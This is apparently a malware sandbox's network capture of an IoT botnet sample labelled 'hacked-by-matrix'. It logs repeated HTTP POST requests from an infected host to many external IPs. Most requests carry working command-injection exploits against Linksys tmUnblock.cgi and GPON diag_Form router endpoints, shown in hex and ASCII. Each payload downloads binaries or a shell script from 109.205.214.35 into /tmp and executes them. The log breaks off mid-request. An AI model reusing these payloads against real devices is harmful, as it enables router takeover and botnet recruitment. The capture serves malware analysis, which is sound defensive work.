                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:08.078715086 CET361INHTTP/1.1 302 Moved Temporarily
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:07 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 138
                                                        Connection: close
                                                        Location: https://127.0.0.1:8080/tmUnblock.cgi
                                                        TH_ISPC: 1
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        297192.168.2.1353066151.59.115.1208080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.149494886 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        298192.168.2.1341710103.173.174.388080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.251602888 CET430OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        299192.168.2.1356434109.106.254.144443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.491859913 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        300192.168.2.1342344109.182.244.130443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.491859913 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        301192.168.2.13378645.12.7.146443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.491889000 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        302192.168.2.1351786109.247.217.245443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.491894960 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        303192.168.2.135658842.0.147.35443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.491903067 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        304192.168.2.13402345.164.96.227443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.491910934 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        305192.168.2.1342186212.146.227.98443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.491933107 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        306192.168.2.1341996212.223.161.187443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.491933107 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        307192.168.2.13397845.65.2.21443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.491970062 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        308192.168.2.13447045.242.230.135443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.491993904 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        309192.168.2.1346284118.65.113.105443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.492021084 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        310192.168.2.136025642.98.136.25443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.492024899 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        311192.168.2.1356146212.23.251.169443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.492049932 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        312192.168.2.134651042.96.65.161443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.492054939 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        313192.168.2.134759042.167.242.122443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.492094994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        314192.168.2.135942223.88.26.2028080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.803796053 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:08.982655048 CET361INHTTP/1.1 302 Moved Temporarily
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 138
                                                        Connection: close
                                                        Location: https://127.0.0.1:8080/tmUnblock.cgi
                                                        TH_ISPC: 1
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        315192.168.2.134210434.49.154.338080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:08.892036915 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
